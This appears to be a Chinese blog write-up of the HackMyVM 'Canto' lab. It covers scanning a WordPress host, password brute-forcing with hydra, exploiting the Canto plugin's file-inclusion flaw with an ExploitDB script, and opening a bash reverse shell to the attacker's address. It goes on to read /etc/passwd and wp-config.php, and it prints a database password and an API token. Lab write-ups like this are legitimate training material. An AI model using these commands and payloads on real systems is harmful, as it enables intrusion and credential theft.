{"id":697,"date":"2024-06-28T17:42:30","date_gmt":"2024-06-28T09:42:30","guid":{"rendered":"http:\/\/162.14.82.114\/?p=697"},"modified":"2024-06-28T17:42:30","modified_gmt":"2024-06-28T09:42:30","slug":"hmv-_-canto","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/697\/06\/28\/2024\/","title":{"rendered":"hmv[-_-]Canto"},"content":{"rendered":"

Canto<\/h1>\n

\"image-20240628144515948\"<\/div>
\n
\"image-20240628150608725\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/canto]\n\u2514\u2500$ rustscan -a 192.168.0.135 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.135:22\nOpen 192.168.0.135:80\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 9.3p1 Ubuntu 1ubuntu3.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 c6:af:18:21:fa:3f:3c:fc:9f:e4:ef:04:c9:16:cb:c7 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKkMLZHCokv5rpKTUUfitgdTSiyieZXC1kqsQS8DEnLgk6x5fOmlzHim2qgiwoJhyEJa7Nj1k3K6pwm5RVxEjEU=\n|   256 ba:0e:8f:0b:24:20:dc:75:b7:1b:04:a1:81:b6:6d:64 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDR8+o8qabpIHzS2zgBZDxfX0Tm5eWBBstEt5QeYN04+\n80\/tcp open  http    syn-ack Apache httpd 2.4.57 ((Ubuntu))\n|_http-generator: WordPress 6.5.3\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Canto\n|_http-server-header: Apache\/2.4.57 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/canto]\n\u2514\u2500$ curl -s http:\/\/192.168.0.135 | html2text | uniq   \n\nCanto\n    * Home\n    * Contact\n\n****** Start having your website more organized with Canto! ******\nDownload<\/code><\/pre>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/canto]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.135\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html,txt,bak,zip\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.135\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              html,txt,bak,zip\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 278]\n\/wp-content           (Status: 301) [Size: 319] [--> http:\/\/192.168.0.135\/wp-content\/]\n\/license.txt          (Status: 200) [Size: 19915]\n\/wp-includes          (Status: 301) [Size: 320] [--> http:\/\/192.168.0.135\/wp-includes\/]\n\/readme.html          (Status: 200) [Size: 7401]\n\/wp-admin             (Status: 301) [Size: 317] [--> http:\/\/192.168.0.135\/wp-admin\/]\n\/.html                (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1102800 \/ 1102805 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
wpscan\u626b\u63cf<\/h3>\n
\u7aef\u53e3\u626b\u63cf\u548c\u76ee\u5f55\u626b\u63cf\u90fd\u663e\u793a\u8fd9\u662f\u4e00\u4e2awordpress<\/code>\u7ad9\u70b9\uff0c\u5c1d\u8bd5\u626b\u63cf\u4e00\u4e0b\u7528\u6237\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/canto]\n\u2514\u2500$ wpscan --url http:\/\/192.168.0.135 -e u --api-token xxxxxxx\n_______________________________________________________________\n         __          _______   _____\n         \\ \\        \/ \/  __ \\ \/ ____|\n          \\ \\  \/\\  \/ \/| |__) | (___   ___  __ _ _ __ \u00ae\n           \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | '_ \\\n            \\  \/\\  \/  | |     ____) | (__| (_| | | | |\n             \\\/  \\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\n\n         WordPress Security Scanner by the WPScan Team\n                         Version 3.8.25\n       Sponsored by Automattic - https:\/\/automattic.com\/\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n[+] WordPress theme in use: twentytwentyfour\n | Location: http:\/\/192.168.0.135\/wp-content\/themes\/twentytwentyfour\/\n | Latest Version: 1.1 (up to date)\n | Last Updated: 2024-04-02T00:00:00.000Z\n | Readme: http:\/\/192.168.0.135\/wp-content\/themes\/twentytwentyfour\/readme.txt\n | [!] Directory listing is enabled\n | Style URL: http:\/\/192.168.0.135\/wp-content\/themes\/twentytwentyfour\/style.css\n | Style Name: Twenty Twenty-Four\n | Style URI: https:\/\/wordpress.org\/themes\/twentytwentyfour\/\n | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...\n | Author: the WordPress team\n | Author URI: https:\/\/wordpress.org\n |\n | Found By: Urls In Homepage (Passive Detection)\n |\n | Version: 1.1 (80% confidence)\n | Found By: Style (Passive Detection)\n |  - http:\/\/192.168.0.135\/wp-content\/themes\/twentytwentyfour\/style.css, Match: 'Version: 1.1'\n\n[+] Enumerating Users (via Passive and Aggressive Methods)\n Brute Forcing Author IDs - Time: 00:00:02 <=====================================================================> (10 \/ 10) 100.00% Time: 00:00:02\n[i] User(s) Identified:\n\n[+] erik\n | Found By: Rss Generator (Passive Detection)\n | Confirmed By:\n |  Wp Json Api (Aggressive Detection)\n |   - http:\/\/192.168.0.135\/index.php\/wp-json\/wp\/v2\/users\/?per_page=100&page=1\n |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n |  Login Error Messages (Aggressive Detection)<\/code><\/pre>\n
\u987a\u4fbf\u626b\u4e00\u4e0b\u63d2\u4ef6\uff1a<\/p>\n
[i] No plugins Found.<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/canto]\n\u2514\u2500$ whatweb http:\/\/192.168.0.135                                                                                              \nhttp:\/\/192.168.0.135 [200 OK] Apache[2.4.57], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.4.57 (Ubuntu)], IP[192.168.0.135], MetaGenerator[WordPress 6.5.5], Script[importmap,module], Title[Canto], UncommonHeaders[link], WordPress[6.5.5]<\/code><\/pre>\n
\u5c1d\u8bd5\u770b\u4e00\u4e0b\u662f\u5426\u5b58\u5728\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n
\"image-20240628154009689\"<\/div><\/p>\n
\u663e\u793a\u90fd\u662f\u63d2\u4ef6\u6f0f\u6d1e\uff0c\u4f46\u662f\u6ca1\u626b\u5230\u63d2\u4ef6\u4fe1\u606f\u3002<\/p>\n
\u5c1d\u8bd5ssh\u7206\u7834<\/h3>\n
\u5f97\u5230\u4e86\u4e00\u4e2a\u7528\u6237\u540derik<\/code>\uff0c\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0bssh<\/code>\u548cwpscan<\/code>\uff0c\u65f6\u95f4\u8f83\u957f<\/p>\n
hydra -l erik -P \/usr\/share\/wordlists\/rockyou.txt  ssh:\/\/192.168.0.135 2>\/dev\/null\nwpscan --url http:\/\/192.168.0.135 -U erik -P \/usr\/share\/wordlists\/rockyou.txt --api-token xxxxxxx<\/code><\/pre>\n
\u7ee7\u7eed\u641c\u7d22\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff1a\u5c1d\u8bd5google\u641c\u7d22\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n
\"image-20240628155215752\"<\/div><\/p>\n
\u63d2\u4ef6\u641c\u7d22<\/h3>\n
\u4f46\u662f\u4e00\u65e0\u6240\u83b7\uff0c\u7ee7\u7eed\u4fe1\u606f\u641c\u96c6\uff0c\u5c1d\u8bd5\u5bfb\u627e\u63d2\u4ef6\uff0c\u524d\u9762\u627e\u7684\u662f\u6bd4\u8f83\u53d7\u6b22\u8fce\u7684\u63d2\u4ef6\uff0c\u8fd9\u6b21\u8981\u6309\u63d2\u4ef6\u5e93\u8fdb\u884c\u641c\u5bfb\uff1a<\/p>\n
\"image-20240628160423760\"<\/div><\/p>\n
\u4e0b\u9762\u662f\u641c\u7d22\u7ed3\u679c\uff0c\u53d1\u73b0\u82e5\u5e72\u63d2\u4ef6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/canto]\n\u2514\u2500$ wpscan --url http:\/\/192.168.0.135 -e ap --plugins-detection mixed --disable-tls-checks --api-token rMh6wld9hJ1Uem1MXDFvUYZc0Yx8slukvSvj8AKaLXE\n_______________________________________________________________\n         __          _______   _____\n         \\ \\        \/ \/  __ \\ \/ ____|\n          \\ \\  \/\\  \/ \/| |__) | (___   ___  __ _ _ __ \u00ae\n           \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | '_ \\\n            \\  \/\\  \/  | |     ____) | (__| (_| | | | |\n             \\\/  \\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\n\n         WordPress Security Scanner by the WPScan Team\n                         Version 3.8.25\n       Sponsored by Automattic - https:\/\/automattic.com\/\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[+] URL: http:\/\/192.168.0.135\/ [192.168.0.135]\n[+] Started: Fri Jun 28 03:59:45 2024\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entry: Server: Apache\/2.4.57 (Ubuntu)\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http:\/\/192.168.0.135\/xmlrpc.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | References:\n |  - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\/\n\n[+] WordPress readme found: http:\/\/192.168.0.135\/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] Upload directory has listing enabled: http:\/\/192.168.0.135\/wp-content\/uploads\/\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http:\/\/192.168.0.135\/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n |  - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\n |  - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\n\n[+] WordPress version 6.5.5 identified (Latest, released on 2024-06-24).\n | Found By: Rss Generator (Passive Detection)\n |  - http:\/\/192.168.0.135\/index.php\/feed\/, <generator>https:\/\/wordpress.org\/?v=6.5.5<\/generator>\n |  - http:\/\/192.168.0.135\/index.php\/comments\/feed\/, <generator>https:\/\/wordpress.org\/?v=6.5.5<\/generator>\n\n[+] WordPress theme in use: twentytwentyfour\n | Location: http:\/\/192.168.0.135\/wp-content\/themes\/twentytwentyfour\/\n | Latest Version: 1.1 (up to date)\n | Last Updated: 2024-04-02T00:00:00.000Z\n | Readme: http:\/\/192.168.0.135\/wp-content\/themes\/twentytwentyfour\/readme.txt\n | [!] Directory listing is enabled\n | Style URL: http:\/\/192.168.0.135\/wp-content\/themes\/twentytwentyfour\/style.css\n | Style Name: Twenty Twenty-Four\n | Style URI: https:\/\/wordpress.org\/themes\/twentytwentyfour\/\n | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...\n | Author: the WordPress team\n | Author URI: https:\/\/wordpress.org\n |\n | Found By: Urls In Homepage (Passive Detection)\n |\n | Version: 1.1 (80% confidence)\n | Found By: Style (Passive Detection)\n |  - http:\/\/192.168.0.135\/wp-content\/themes\/twentytwentyfour\/style.css, Match: 'Version: 1.1'\n\n[+] Enumerating All Plugins (via Passive and Aggressive Methods)\n Checking Known Locations - Time: 00:04:03 <=============================================================> (105905 \/ 105905) 100.00% Time: 00:04:03[+] Checking Plugin Versions (via Passive and Aggressive Methods)\n\n[i] Plugin(s) Identified:\n\n[+] akismet\n | Location: http:\/\/192.168.0.135\/wp-content\/plugins\/akismet\/\n | Latest Version: 5.3.2 (up to date)\n | Last Updated: 2024-05-31T16:57:00.000Z\n | Readme: http:\/\/192.168.0.135\/wp-content\/plugins\/akismet\/readme.txt\n |\n | Found By: Known Locations (Aggressive Detection)\n |  - http:\/\/192.168.0.135\/wp-content\/plugins\/akismet\/, status: 200\n |\n | Version: 5.3.2 (100% confidence)\n | Found By: Readme - Stable Tag (Aggressive Detection)\n |  - http:\/\/192.168.0.135\/wp-content\/plugins\/akismet\/readme.txt\n | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)\n |  - http:\/\/192.168.0.135\/wp-content\/plugins\/akismet\/readme.txt\n\n[+] canto\n | Location: http:\/\/192.168.0.135\/wp-content\/plugins\/canto\/\n | Last Updated: 2024-05-13T08:21:00.000Z\n | Readme: http:\/\/192.168.0.135\/wp-content\/plugins\/canto\/readme.txt\n | [!] The version is out of date, the latest version is 3.0.8\n |\n | Found By: Known Locations (Aggressive Detection)\n |  - http:\/\/192.168.0.135\/wp-content\/plugins\/canto\/, status: 200\n |\n | [!] 4 vulnerabilities identified:\n |\n | [!] Title: Canto <= 3.0.8 - Unauthenticated Blind SSRF\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/29c89cc9-ad9f-4086-a762-8896eba031c6\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-28976\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-28977\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-28978\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-24063\n |      - https:\/\/gist.github.com\/p4nk4jv\/87aebd999ce4b28063943480e95fd9e0\n |\n | [!] Title: Canto < 3.0.5 - Unauthenticated Remote File Inclusion\n |     Fixed in: 3.0.5\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/9e2817c7-d4aa-4ed9-a3d7-18f3117ed810\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2023-3452\n |\n | [!] Title: Canto < 3.0.7 - Unauthenticated RCE\n |     Fixed in: 3.0.7\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/1595af73-6f97-4bc9-9cb2-14a55daaa2d4\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2024-25096\n |      - https:\/\/patchstack.com\/database\/vulnerability\/canto\/wordpress-canto-plugin-3-0-6-unauthenticated-remote-code-execution-rce-vulnerability\n |\n | [!] Title: Canto <= 3.0.8 - Unauthenticated Remote File Inclusion\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/3ea53721-bdf6-4203-b6bc-2565d6283159\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2024-4936\n |      - https:\/\/www.wordfence.com\/threat-intel\/vulnerabilities\/id\/95a68ae0-36da-499b-a09d-4c91db8aa338\n |\n | Version: 3.0.4 (100% confidence)\n | Found By: Readme - Stable Tag (Aggressive Detection)\n |  - http:\/\/192.168.0.135\/wp-content\/plugins\/canto\/readme.txt\n | Confirmed By: Composer File (Aggressive Detection)\n |  - http:\/\/192.168.0.135\/wp-content\/plugins\/canto\/package.json, Match: '3.0.4'\n\n[+] WPScan DB API OK\n | Plan: free\n | Requests Done (during the scan): 2\n | Requests Remaining: 17\n\n[+] Finished: Fri Jun 28 04:04:06 2024\n[+] Requests Done: 105921\n[+] Cached Requests: 40\n[+] Data Sent: 28.538 MB\n[+] Data Received: 14.227 MB\n[+] Memory used: 527.664 MB\n[+] Elapsed time: 00:04:20<\/code><\/pre>\n
CVE-2023-2352<\/h3>\n
\u53d1\u73b0\u5b58\u5728\u4e00\u4e2a\u540d\u4e3aCanto<\/code>\u7684\u63d2\u4ef6\uff0c\u5c1d\u8bd5\u5229\u7528\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n
\"image-20240628161128383\"<\/div><\/p>\n
\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/canto]\n\u2514\u2500$ searchsploit canto         \n----------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title                                                                                                   |  Path\n----------------------------------------------------------------------------------------------------------------- ---------------------------------NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC)                                              | windows\/dos\/45095.py\nWordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)                                                      | multiple\/webapps\/49189.txt\nWordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)                     | php\/webapps\/51826.py\n----------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/canto]\n\u2514\u2500$ searchsploit -m php\/webapps\/51826.py \n  Exploit: WordPress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)\n      URL: https:\/\/www.exploit-db.com\/exploits\/51826\n     Path: \/usr\/share\/exploitdb\/exploits\/php\/webapps\/51826.py\n    Codes: N\/A\n Verified: False\nFile Type: Python script, ASCII text executable, with very long lines (344)\nCopied to: \/home\/kali\/temp\/canto\/51826.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/canto]\n\u2514\u2500$ python3 51826.py -u http:\/\/192.168.0.135 -LHOST 192.168.0.143 -c 'whoami'   \nLocal web server on port 8080...\nExploitation URL: http:\/\/192.168.0.135\/wp-content\/plugins\/canto\/includes\/lib\/download.php?wp_abspath=http:\/\/192.168.0.143:8080&cmd=whoami\n192.168.0.135 - - [28\/Jun\/2024 04:14:23] "GET \/wp-admin\/admin.php HTTP\/1.1" 200 -\nServer response:\nwww-data<\/code><\/pre>\n
\u53d1\u73b0\u662f\u53ef\u4ee5\u7528\u7684\uff0c\u5c1d\u8bd5\u8fdb\u884c\u53cd\u5f39shell\uff1a<\/p>\n
bash -c "exec bash -i &>\/dev\/tcp\/192.168.0.143\/1234 <&1"\nbash%20-c%20%22exec%20bash%20-i%20%26%3E%2Fdev%2Ftcp%2F192.168.0.143%2F1234%20%3C%261%22<\/code><\/pre>\n
\"image-20240628162319023\"<\/div><\/p>\n
\"image-20240628162347656\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
(remote) www-data@canto:\/var\/www\/html\/wp-content\/plugins\/canto\/includes\/lib$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@canto:\/var\/www\/html\/wp-content\/plugins\/canto\/includes\/lib$ cd ~ \n(remote) www-data@canto:\/var\/www$ ls\nhtml\n(remote) www-data@canto:\/var\/www$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\ndhcpcd:x:100:65534:DHCP Client Daemon,,,:\/usr\/lib\/dhcpcd:\/bin\/false\nmessagebus:x:101:106::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-resolve:x:996:996:systemd Resolver:\/:\/usr\/sbin\/nologin\npollinate:x:102:1::\/var\/cache\/pollinate:\/bin\/false\npolkitd:x:995:995:polkit:\/nonexistent:\/usr\/sbin\/nologin\nsyslog:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\nuuidd:x:104:110::\/run\/uuidd:\/usr\/sbin\/nologin\ntcpdump:x:105:111::\/nonexistent:\/usr\/sbin\/nologin\ntss:x:106:112:TPM software stack,,,:\/var\/lib\/tpm:\/bin\/false\nlandscape:x:107:113::\/var\/lib\/landscape:\/usr\/sbin\/nologin\nfwupd-refresh:x:108:114:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\nusbmux:x:109:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin\nsshd:x:110:65534::\/run\/sshd:\/usr\/sbin\/nologin\nlxd:x:999:100::\/var\/snap\/lxd\/common\/lxd:\/bin\/false\nmysql:x:111:116:MySQL Server,,,:\/nonexistent:\/bin\/false\nerik:x:1001:1001::\/home\/erik:\/bin\/bash\n(remote) www-data@canto:\/var\/www$ \n(remote) www-data@canto:\/var\/www$ cat \/etc\/passwd | grep "sh"  \nroot:x:0:0:root:\/root:\/bin\/bash\nfwupd-refresh:x:108:114:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsshd:x:110:65534::\/run\/sshd:\/usr\/sbin\/nologin\nerik:x:1001:1001::\/home\/erik:\/bin\/bash\n(remote) www-data@canto:\/var\/www$ ls \/home\nerik\n(remote) www-data@canto:\/var\/www$ cd html\n(remote) www-data@canto:\/var\/www\/html$ ls -la\ntotal 248\ndrwxr-xr-x  5 www-data www-data  4096 Jun 28 07:08 .\ndrwxr-xr-x  3 www-data www-data  4096 May 12 13:57 ..\n-rw-r--r--  1 www-data www-data   523 May 12 11:16 .htaccess\n-rw-r--r--  1 www-data www-data   405 May 12 11:09 index.php\n-rw-r--r--  1 www-data www-data 19915 May 12 11:09 license.txt\n-rw-r--r--  1 www-data www-data  7401 Jun 28 07:08 readme.html\n-rw-r--r--  1 www-data www-data  7387 May 12 11:09 wp-activate.php\ndrwxr-xr-x  9 www-data www-data  4096 May 12 11:09 wp-admin\n-rw-r--r--  1 www-data www-data   351 May 12 11:09 wp-blog-header.php\n-rw-r--r--  1 www-data www-data  2323 May 12 11:09 wp-comments-post.php\n-rw-r--r--  1 www-data www-data  3012 May 12 11:09 wp-config-sample.php\n-rw-r--r--  1 root     root      3120 May 12 15:12 wp-config.php\ndrwxr-xr-x  6 www-data www-data  4096 Jun 28 07:08 wp-content\n-rw-r--r--  1 www-data www-data  5638 May 12 11:09 wp-cron.php\ndrwxr-xr-x 30 www-data www-data 16384 May 12 11:09 wp-includes\n-rw-r--r--  1 www-data www-data  2502 May 12 11:09 wp-links-opml.php\n-rw-r--r--  1 www-data www-data  3927 May 12 11:09 wp-load.php\n-rw-r--r--  1 www-data www-data 50917 May 12 11:09 wp-login.php\n-rw-r--r--  1 www-data www-data  8525 May 12 11:09 wp-mail.php\n-rw-r--r--  1 www-data www-data 28427 May 12 11:09 wp-settings.php\n-rw-r--r--  1 www-data www-data 34385 May 12 11:09 wp-signup.php\n-rw-r--r--  1 www-data www-data  4885 May 12 11:09 wp-trackback.php\n-rw-r--r--  1 www-data www-data  3246 May 12 11:09 xmlrpc.php\n(remote) www-data@canto:\/var\/www\/html$ cat wp-config.php<\/code><\/pre>\n
<?php\n\/**\n * The base configuration for WordPress\n *\n * The wp-config.php creation script uses this file during the installation.\n * You don't have to use the website, you can copy this file to "wp-config.php"\n * and fill in the values.\n *\n * This file contains the following configurations:\n *\n * * Database settings\n * * Secret keys\n * * Database table prefix\n * * ABSPATH\n *\n * @link https:\/\/wordpress.org\/documentation\/article\/editing-wp-config-php\/\n *\n * @package WordPress\n *\/\n\n\/\/ ** Database settings - You can get this info from your web host ** \/\/\n\/** The name of the database for WordPress *\/\ndefine( 'DB_NAME', 'wordpress' );\n\n\/** Database username *\/\ndefine( 'DB_USER', 'wordpress' );\n\n\/** Database password *\/\ndefine( 'DB_PASSWORD', '2NCVjoWVE9iwxPz' );\n\n\/** Database hostname *\/\ndefine( 'DB_HOST', 'localhost' );\n\n\/** Database charset to use in creating database tables. *\/\ndefine( 'DB_CHARSET', 'utf8' );\n\n\/** The database collate type. Don't change this if in doubt. *\/\ndefine( 'DB_COLLATE', '' );\n\ndefine('WP_HOME','http:\/\/' . $_SERVER['SERVER_ADDR']);\ndefine('WP_SITEURL','http:\/\/' . $_SERVER['SERVER_ADDR']);\n\n\/**#@+\n * Authentication unique keys and salts.\n *\n * Change these to different unique phrases! You can generate these using\n * the {@link https:\/\/api.wordpress.org\/secret-key\/1.1\/salt\/ WordPress.org secret-key service}.\n *\n * You can change these at any point in time to invalidate all existing cookies.\n * This will force all users to have to log in again.\n *\n * @since 2.6.0\n *\/\ndefine( 'AUTH_KEY',         'put your unique phrase here' );\ndefine( 'SECURE_AUTH_KEY',  'put your unique phrase here' );\ndefine( 'LOGGED_IN_KEY',    'put your unique phrase here' );\ndefine( 'NONCE_KEY',        'put your unique phrase here' );\ndefine( 'AUTH_SALT',        'put your unique phrase here' );\ndefine( 'SECURE_AUTH_SALT', 'put your unique phrase here' );\ndefine( 'LOGGED_IN_SALT',   'put your unique phrase here' );\ndefine( 'NONCE_SALT',       'put your unique phrase here' );\n\n\/**#@-*\/\n\n\/**\n * WordPress database table prefix.\n *\n * You can have multiple installations in one database if you give each\n * a unique prefix. Only numbers, letters, and underscores please!\n *\/\n$table_prefix = 'wp_';\n\n\/**\n * For developers: WordPress debugging mode.\n *\n * Change this to true to enable the display of notices during development.\n * It is strongly recommended that plugin and theme developers use WP_DEBUG\n * in their development environments.\n *\n * For information on other constants that can be used for debugging,\n * visit the documentation.\n *\n * @link https:\/\/wordpress.org\/documentation\/article\/debugging-in-wordpress\/\n *\/\ndefine( 'WP_DEBUG', false );\n\n\/* Add any custom values between this line and the "stop editing" line. *\/\n\n\/* That's all, stop editing! Happy publishing. *\/\n\n\/** Absolute path to the WordPress directory. *\/\nif ( ! defined( 'ABSPATH' ) ) {\n        define( 'ABSPATH', __DIR__ . '\/' );\n}\n\n\/** Sets up WordPress vars and included files. *\/\nrequire_once ABSPATH . 'wp-settings.php';<\/code><\/pre>\n
\u67e5\u770b\u6570\u636e\u5e93<\/h3>\n
\u5f97\u5230\u4e86\u7528\u6237\u540d\u5bc6\u7801\uff0c\u5c1d\u8bd5\u8fde\u63a5\u6570\u636e\u5e93\uff1a<\/p>\n
wordpress\n2NCVjoWVE9iwxPz<\/code><\/pre>\n
